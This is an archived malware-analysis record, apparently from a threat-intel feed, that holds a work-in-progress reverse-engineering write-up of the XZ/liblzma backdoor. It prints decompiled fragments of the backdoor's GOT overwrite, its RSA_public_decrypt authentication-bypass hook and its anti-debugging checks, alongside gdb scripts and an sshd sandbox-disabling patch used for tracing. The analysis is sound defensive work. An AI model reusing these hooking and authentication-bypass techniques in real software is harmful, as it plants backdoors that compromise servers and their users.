{
	"id": "5b3ebe51-0b21-4959-b874-993c63e5ac36",
	"created_at": "2026-04-06T00:21:27.652034Z",
	"updated_at": "2026-04-10T13:11:42.17376Z",
	"deleted_at": null,
	"sha1_hash": "bb949a0cab1743c3ae0341a061b03bb40b6c3315",
	"title": "[WIP] XZ Backdoor Analysis and symbol mapping",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 143333,
	"plain_text": "[WIP] XZ Backdoor Analysis and symbol mapping\r\nBy smx-smx\r\nArchived: 2026-04-05 16:56:58 UTC\r\nDiscord Room for discussion\r\nhttps://discord.com/invite/maFYmgQkYH\r\nGithub repository:\r\nhttps://github.com/smx-smx/xzre\r\nInit routines\r\nLlzma_delta_props_decoder -\u003e backdoor_ctx_save\r\nLlzma_block_param_encoder_0 -\u003e backdoor_init\r\nLlzma_delta_props_encoder -\u003e backdoor_init_stage2\r\nPrefix Trie (https://social.hackerspace.pl/@q3k/112184695043115759)\r\nLlzip_decode_1 -\u003e table1\r\nLcrc64_clmul_1 -\u003e table2\r\nLlz_stream_decode -\u003e count_1_bits\r\nLsimple_coder_update_0 -\u003e table_get\r\nRetrieves the index of the encoded string given the plaintext string in memory\r\nLcrc_init_0 -\u003e import_lookup\r\n.Lcrc64_generic.0 -\u003e import_lookup_ex\r\nAnti RE and x64 code Dasm\r\nLlzma_block_buffer_encode_0 -\u003e check_software_breakpoint\r\nLx86_code_part_0 -\u003e code_dasm\r\nLlzma_index_iter_rewind_cold -\u003e check_return_address\r\nhttps://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504\r\nPage 1 of 10\n\nChecks if the return address has been tampered with. This function is called at the beginning of a\r\n\"protected\" function. 
If the check fails, the function returns early without doing anything\r\nLlzma_delta_decoder_init_part_0 -\u003e backdoor_vtbl_init\r\nIt sets up a vtable with core functions used by the backdoor\r\nLstream_decoder_memconfig_part_1 -\u003e get_lzma_allocator\r\nLlzma_simple_props_encode_1 -\u003e j_tls_get_addr\r\nLlzma_block_uncomp_encode_0 -\u003e rodata_ptr_offset\r\nLlzma12_coder_1 -\u003e global_ctx\r\nELF parsing\r\nLlzma_filter_decoder_is_supported.part.0 -\u003e parse_elf_invoke\r\nLmicrolzma_encoder_init_1 -\u003e parse_elf_init\r\nLget_literal_price_part_0 -\u003e parse_elf\r\nLlzma_stream_header_encode_part_0 -\u003e get_ehdr_address\r\nLparse_bcj_0 -\u003e process_elf_seg\r\nLlzma_simple_props_size_part_0 -\u003e is_gnu_relro\r\nStealthy ELF magic verification\r\n // locate elf header\r\n while ( 1 )\r\n {\r\n if ( (unsigned int)table_get(ehdr, 0LL) == STR__ELF ) // 0x300\r\n break; // found\r\n ehdr -= 64; // backtrack and try again\r\n if ( ehdr == start_pointer )\r\n goto not_found;\r\n }\r\nLlzma_stream_flags_compare_1 -\u003e get_rodata_ptr\r\nVerified or Suspected function hooking\r\nhttps://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504\r\nPage 2 of 10\n\nLlzma_index_memusage_0 -\u003e apply_entries\r\nLlzma_check_init_part_0 -\u003e apply_one_entry\r\nLrc_read_init_part_0 -\u003e apply_one_entry_internal\r\nLlzma_lzma_optimum_fast_0 -\u003e install_entries\r\nLlzip_decoder_memconfig_part_0 -\u003e installed_func_0\r\nLlzma_index_prealloc_0 -\u003e RSA_public_decrypt GOT hook/detour\r\nLlzma_index_stream_size_1 -\u003e check_special_rsa_key -\u003e (thanks q3k)\r\nCalled from Llzma_index_prealloc_0 , it checks if the supplied RSA key is the special key to\r\nbypass the normal authentication flow\r\nLindex_decode_1 -\u003e installed_func_2\r\nLindex_encode_1 -\u003e installed_func_3\r\nLlzma2_decoder_end_1 -\u003e apply_one_entry_ex\r\nLlzma2_encoder_init.1 -\u003e apply_method_1\r\nLlzma_memlimit_get_1 -\u003e apply_method_2\r\nlzma 
allocator / call hiding\r\nLstream_decoder_mt_end_0 -\u003e get_lzma_allocator_addr\r\nLinit_pric_table_part_1 -\u003e fake_lzma_allocator\r\nLstream_decode_1 -\u003e fake_lzma_free\r\ncore functionality\r\nLlzma_delta_props_encode_part_0 -\u003e resolve_imports (including system() )\r\nLlzma_index_stream_flags_0 -\u003e process_shared_libraries\r\nReads the list of loaded libraries through _r_debug-\u003er_map , and calls\r\nprocess_shared_libraries_map to traverse it\r\nLlzma_index_encoder_init_1 -\u003e process_shared_libraries_map\r\nTraverses the list of loaded libraries, looking for specific libraries\r\nfunc @0x7620 : It makes indirect calls through the vtable configured by backdoor_vtbl_init , and is called by\r\nthe RSA_public_decrypt hook (func#1) when certain conditions are met\r\nSoftware Breakpoint check, method 1\r\nThis method checks whether the endbr64 instruction, which is always present at the beginning of every function in the\r\nmalware, has been overwritten. 
GDB would typically do this when inserting a software breakpoint\r\n/*** address: 0xAB0 ***/\r\n__int64 check_software_breakpoint(_DWORD *code_addr, __int64 a2, int a3)\r\n{\r\n unsigned int v4;\r\n v4 = 0;\r\n // [for a3=0xe230], true when *v = 0xfa1e0ff3 (aka endbr64)\r\n if ( a2 - code_addr \u003e 3 )\r\n return *code_addr + (a3 | 0x5E20000) == 0xF223;// 5E2E230\r\n return v4;\r\n}\r\nFunction backdoor_init (0xA784)\r\n__int64 backdoor_init(rootkit_ctx *ctx, DWORD *prev_got_ptr)\r\n{\r\n _DWORD *v2;\r\n __int64 runtime_offset;\r\n bool is_cpuid_got_zero;\r\n void *cpuid_got_ptr;\r\n __int64 got_value;\r\n _QWORD *cpuid_got_ptr_1;\r\n ctx-\u003eself = ctx;\r\n // store data before overwrite\r\n backdoor_ctx_save(ctx);\r\n ctx-\u003eprev_got_ptr = ctx-\u003egot_ptr;\r\n runtime_offset = ctx-\u003ehead - ctx-\u003eself;\r\n ctx-\u003eruntime_offset = runtime_offset;\r\n is_cpuid_got_zero = (char *)*(\u0026Llzma_block_buffer_decode_0 + 1) + runtime_offset == 0LL;\r\n cpuid_got_ptr = (char *)*(\u0026Llzma_block_buffer_decode_0 + 1) + runtime_offset;\r\n ctx-\u003egot_ptr = cpuid_got_ptr;\r\n if ( !is_cpuid_got_zero )\r\n {\r\n cpuid_got_ptr_1 = cpuid_got_ptr;\r\n got_value = *(QWORD *)cpuid_got_ptr;\r\n // replace with Llzma_delta_props_encoder (backdoor_init_stage2)\r\nhttps://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504\r\nPage 4 of 10\n\n*(QWORD *)cpuid_got_ptr = (char *)*(\u0026Llzma_block_buffer_decode_0 + 2) + runtime_offset;\r\n // this calls Llzma_delta_props_encoder due to the GOT overwrite\r\n runtime_offset = cpuid((unsigned int)ctx, prev_got_ptr, cpuid_got_ptr, \u0026Llzma_block_buffer_decode\r\n // restore original\r\n *cpuid_got_ptr_1 = got_value;\r\n }\r\n return runtime_offset;\r\n}\r\nFunction Name matching (function 0x28C0)\r\nstr_id = table_get(a6, 0LL);\r\n...\r\nif ( str_id == STR_RSA_public_decrypt_ \u0026\u0026 v11 )\r\n...\r\nelse if ( v13 \u0026\u0026 str_id == STR_EVP_PKEY_set__RSA_ )\r\n...\r\nelse if (str_id != 
STR_RSA_get__key_ || !v17 )\r\nHidden calls (via lzma_alloc )\r\nlzma_alloc has the following prototype:\r\nextern void * lzma_alloc (size_t size , const lzma_allocator * allocator )\r\nThe malware implements a custom allocator, which is obtained from get_lzma_allocator @ 0x4050\r\nvoid *get_lzma_allocator()\r\n{\r\n return get_lzma_allocator_addr() + 8;\r\n}\r\nchar *get_lzma_allocator_addr()\r\n{\r\n unsigned int i;\r\n char *mem;\r\n // Llookup_filter_part_0 holds the relative offset of `_Ldecoder_1` - 180h (0xC930)\r\n // by adding 0x180, it gets to 0xCAB0 (Lx86_coder_destroy), Since the caller adds +8, we get to 0xC\r\n mem = (char *)Llookup_filter_part_0;\r\n for ( i = 0; i \u003c= 0xB; ++i )\r\n mem += 32;\r\nhttps://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504\r\nPage 5 of 10\n\nreturn mem;\r\n}\r\nThe interface for lzma_allocator can be viewed for example here:\r\nhttps://github.com/frida/xz/blob/e70f5800ab5001c9509d374dbf3e7e6b866c43fe/src/liblzma/api/lzma/base.h#L378-\r\nL440\r\nTherefore, the allocator is Linit_pric_table_part_1 and free is Lstream_decode_1\r\nNOTE: the function used for alloc is very likely import_lookup_ex , which turns lzma_alloc into an\r\nimport resolution function. this is used a lot in resolve_imports , e.g.:\r\n system_func = lzma_alloc(STR_system_, lzma_allocator);\r\n ctx-\u003esystem = system_func;\r\n if ( system_func )\r\n ++ctx-\u003enum_imports;\r\n shutdown_func = lzma_alloc(STR_shutdown_, lzma_allocator);\r\n ctx-\u003eshutdown = shutdown_func;\r\n if ( shutdown_func )\r\n ++ctx-\u003enum_imports;\r\nThe third lzma_allocator field, opaque , is abused to pass information about the loaded ELF file to the \"fake\r\nallocator\" function. 
This is highlighted quite well by function Llzma_index_buffer_encode_0 :\r\n__int64 Llzma_index_buffer_encode_0(Elf64_Ehdr **p_elf, struct_elf_info *elf_info, struct_ctx *ctx)\r\n{\r\n _QWORD *lzma_allocator;\r\n __int64 result;\r\n __int64 fn_read;\r\n __int64 fn_errno_location;\r\n lzma_allocator = get_lzma_allocator();\r\n result = parse_elf(*p_elf, elf_info); // reads elf into elf_info\r\n if ( (_DWORD)result )\r\n {\r\n lzma_allocator[2] = elf_info; // set opaque field to the parsed elf info\r\n fn_read = lzma_alloc(STR_read_, lzma_allocator);\r\n ctx-\u003efn_read = fn_read;\r\n if ( fn_read )\r\n ++ctx-\u003enum_imports;\r\n fn_errno_location = lzma_alloc(STR___errno_location_, lzma_allocator);\r\n ctx-\u003efn_errno_location = fn_errno_location;\r\n if ( fn_errno_location )\r\n ++ctx-\u003enum_imports;\r\n return ctx-\u003enum_imports == 2; // true if we found both imports\r\n }\r\n return result;\r\n}\r\nNote how the malware passes an EncodedStringID in place of size\r\nDynamic analysis\r\nAnalyzing the initialization routine\r\n1. Replace the endbr64 in get_cpuid with a jmp . (\"\\xeb\\xfe\")\r\nroot@debian:~# cat /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1 \u003e liblzma.so.5.6.1\r\nroot@debian:~# perl -pe 's/\\xF3\\x0F\\x1E\\xFA\\x55\\x48\\x89\\xF5\\x4C\\x89\\xCE/\\xEB\\xFE\\x90\\x90\\x55\\x48\\x89\\\r\n2. Force sshd to use the modified library with LD_PRELOAD\r\n# env -i LC_LANG=C LD_PRELOAD=$PWD/liblzma.so.5.6.1 /usr/sbin/sshd -h\r\nNOTE: anarazel recommends using LD_LIBRARY_PATH with a symlink instead, since LD_PRELOAD changes the\r\ninitialization order and could interfere with the normal flow of the malware\r\n2b. 
or use this gdbinit file to do it all at once\r\n# cat gdbinit\r\nset confirm off\r\nunset env\r\n## comment this out if you don't want to debug the initialization code\r\n## (or use LD_LIBRARY_PATH instead)\r\nset env LD_PRELOAD=/root/sshd/liblzma.so.5.6.1\r\nset env LANG=C\r\nfile /usr/sbin/sshd\r\n## start sshd on port 2022\r\nset args -p 2022\r\nset disassembly-flavor intel\r\nset confirm on\r\nset startup-with-shell off\r\nshow env\r\nshow args\r\n# gdb -x gdbinit\r\n(gdb) r\r\nStarting program: /usr/sbin/sshd -p 222\r\n^C \u003c-- send CTRL-C\r\nhttps://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504\r\nPage 7 of 10\n\nProgram received signal SIGINT, Interrupt.\r\n0x00007ffff7f8a7f0 in ?? ()\r\n3. Attach to the frozen process with your favourite debugger ( gdb attach pid )\r\n(gdb) bt\r\n#0 0x00007f8cb3b067f0 in ?? () from /root/sshd/liblzma.so.5.6.1\r\n#1 0x00007f8cb3b08c29 in lzma_crc32 () from /root/sshd/liblzma.so.5.6.1\r\n#2 0x00007f8cb3b4ffab in elf_machine_rela (skip_ifunc=\u003coptimized out\u003e,\r\n reloc_addr_arg=0x7f8cb3b3dda0 \u003clzma_crc32@got[plt]\u003e,\r\n version=\u003coptimized out\u003e, sym=0x7f8cb3b03018, reloc=0x7f8cb3b04fc8,\r\n scope=0x7f8cb3b3f4f8, map=0x7f8cb3b3f170)\r\n at ../sysdeps/x86_64/dl-machine.h:300\r\n#3 elf_dynamic_do_Rela (skip_ifunc=\u003coptimized out\u003e, lazy=\u003coptimized out\u003e,\r\n nrelative=\u003coptimized out\u003e, relsize=\u003coptimized out\u003e,\r\n reladdr=\u003coptimized out\u003e, scope=\u003coptimized out\u003e, map=0x7f8cb3b3f170)\r\n at ./elf/do-rel.h:147\r\n#4 _dl_relocate_object (l=l@entry=0x7f8cb3b3f170, scope=\u003coptimized out\u003e,\r\n reloc_mode=\u003coptimized out\u003e, consider_profiling=\u003coptimized out\u003e,\r\n consider_profiling@entry=0) at ./elf/dl-reloc.c:301\r\n#5 0x00007f8cb3b5e6e9 in dl_main (phdr=\u003coptimized out\u003e, phnum=\u003coptimized out\u003e,\r\n user_entry=\u003coptimized out\u003e, auxv=\u003coptimized out\u003e) at ./elf/rtld.c:2318\r\n#6 
0x00007f8cb3b5af0f in _dl_sysdep_start (\r\n start_argptr=start_argptr@entry=0x7ffe17e402e0,\r\n dl_main=dl_main@entry=0x7f8cb3b5c900 \u003cdl_main\u003e)\r\n at ../sysdeps/unix/sysv/linux/dl-sysdep.c:140\r\n#7 0x00007f8cb3b5c60c in _dl_start_final (arg=0x7ffe17e402e0)\r\n at ./elf/rtld.c:498\r\n#8 _dl_start (arg=0x7ffe17e402e0) at ./elf/rtld.c:585\r\n#9 0x00007f8cb3b5b4d8 in _start () from /lib64/ld-li\r\nnux-x86-64.so.2\r\n#10 0x0000000000000002 in ?? ()\r\n#11 0x00007ffe17e40fa1 in ?? ()\r\n#12 0x00007ffe17e40fb0 in ?? ()\r\n#13 0x0000000000000000 in ?? ()\r\nNOTE: _get_cpuid will call function 0xA710, whose purpose is to detect if we're at the right point to initialize\r\nthe backdoor Why? Because elf_machine_rela will call _get_cpuid for both lzma_crc32 and lzma_crc64 .\r\nSince the modified code is part of lzma_crc64 , 0xA710 has a simple call counter in it to trace how many times it\r\nhas been called, and make sure the modification doesn't trigger for lzma_crc32 .\r\nfirst call (0): -\u003e lzma_crc32\r\nsecond call (1): -\u003e lzma_crc64\r\nhttps://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504\r\nPage 8 of 10\n\nif ( call_counter == 1 )\r\n {\r\n /** NOTE: some of these fields are unverified and guessed **/\r\n rootkit_ctx.head = 1LL;\r\n memset(\u0026rootkit_ctx.runtime_offset, 0, 32);\r\n rootkit_ctx.prev_got_ptr = prev_got_ptr;\r\n backdoor_init(\u0026rootkit_ctx, prev_got_ptr); // replace cpuid got entry\r\n }\r\n ++call_counter;\r\n cpuid(a1, \u0026v5, \u0026v6, \u0026v7, \u0026rootkit_ctx);\r\n return v5;\r\n}\r\nAt this point, you can issue detach and attach with other debuggers if needed.\r\nOnce attached, set relevant breakpoints and restore the original bytes (\"\\xF3\\x0F\\x1E\\xFA\")\r\nbreakpoint on RSA_public_decrypt hook\r\nRun this gdb script on the sshd listener process (this new gdbinit script should account for eventual differences in\r\nlibrary load address - it didn't happen for me in the first tests but it did later 
on)\r\nset pagination off\r\nset follow-fork-mode child\r\ncatch load\r\n# now we forked, wait for lzma\r\ncatch load liblzma\r\nc\r\n# now we have lzma\r\n# 0x12750: offset from base\r\nhbreak *(lzma_crc32 - 0x2640 + 0x12750)\r\nset disassembly-flavor intel\r\nset pagination on\r\nc\r\nNow connect via https://gist.github.com/keeganryan/a6c22e1045e67c17e88a606dfdf95ae4\r\n...\r\nThread 3.1 \"sshd\" hit Breakpoint 1, 0x00007ffff73d1d00 in ?? () from /lib/x86_64-linux-gnu/liblzma.so.5\r\n(gdb) bt\r\n#0 0x00007ffff73d1d00 in ?? () from /lib/x86_64-linux-gnu/liblzma.so.5\r\n#1 0x00007ffff73d1ae7 in ?? () from /lib/x86_64-linux-gnu/liblzma.so.5 \u003c-- Llzma_index_prealloc_0 (offset 0x48\r\n#2 0x00005555556bdd00 in ?? ()\r\n#3 0x0000000100000004 in ?? ()\r\n#4 0x00007fffffffdeb0 in ?? ()\r\nhttps://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504\r\nPage 9 of 10\n\n#5 0x00000001f74b5d7a in ?? ()\r\n#6 0x0000000000000000 in ?? ()\r\nRSA_public_decrypt GOT hook (Llzma_index_prealloc_0)\r\n /** the following happens during pubkey login **/\r\n \r\n params[0] = 1; // should we call original?\r\n // this call checks if the supplied RSA key is special\r\n result = installed_func_1(rsa_key, global_ctx, params);\r\n // if still 1, the payload didn't trigger, call the original function\r\n // if 0, bypass validation\r\n if ( params[0] )\r\n return real_RSA_public_decrypt(flen, from, to, rsa_key);\r\n return result;\r\nBinary patch for sshd to disable seccomp and chroot (allows Frida tracing of [net] processes)\r\n\u003e fc /b sshd sshd_patched\r\nComparing files sshd sshd_patched\r\n0001332A: 75 90\r\n0001332B: 6D 90\r\n----\r\n0004FC24: 41 C3\r\n0004FC25: 54 90\r\n----\r\n00109010: 01 00\r\n0001332A: changes the following JMP to not be taken: https://github.com/openssh/openssh-portable/blob/43e7c1c07cf6aae7f4394ca8ae91a3efc46514e2/sshd.c#L448-L449\r\n0004FC24: changes the ssh_sandbox_child function to be a no-op: 
https://github.com/openssh/openssh-portable/blob/43e7c1c07cf6aae7f4394ca8ae91a3efc46514e2/sandbox-seccomp-filter.c#L490\r\n00109010: changes the default value of privsep_chroot from 1 to 0 (probably redundant, since it gets\r\noverwritten)\r\nSource: https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504"
	],
	"report_names": [
		"a6112d54777845d389bd7126d6e9f504"
	],
	"threat_actors": [],
	"ts_created_at": 1775434887,
	"ts_updated_at": 1775826702,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bb949a0cab1743c3ae0341a061b03bb40b6c3315.pdf",
		"text": "https://archive.orkl.eu/bb949a0cab1743c3ae0341a061b03bb40b6c3315.txt",
		"img": "https://archive.orkl.eu/bb949a0cab1743c3ae0341a061b03bb40b6c3315.jpg"
	}
}